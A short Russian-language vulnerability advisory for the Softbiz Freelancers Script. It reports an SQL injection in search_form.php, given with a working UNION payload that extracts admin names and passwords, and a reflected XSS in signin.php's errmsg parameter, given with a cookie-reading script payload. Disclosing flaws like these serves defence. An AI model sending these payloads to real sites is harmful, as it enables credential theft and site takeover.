Программа: Softbiz Freelancers Script 1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных сценарием search_form.php. Удаленный пользователь может
с помощью специально сформированного запроса выполнить произвольные SQL команды
в базе данных приложения.
Пример:
search_form.php?sb_showresult=1&sb_protype=999999%20union/**/select/*
*/0,CoNcAt(0x4c6f67696e3a,sb_admin_name,0x3c686579206578706c6f69
743e2050617373776f72643a,sb_pwd,0x3c686579206578706c6f69743e),2/**/from/**/sbprj_admin/*
Уязвимость существует из-за недостаточной обработки входных данных в
параметре «errmsg» сценарием signin.php. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
http://Sitename/signin.php?errmsg=<script>alert(document.cookie);</script>
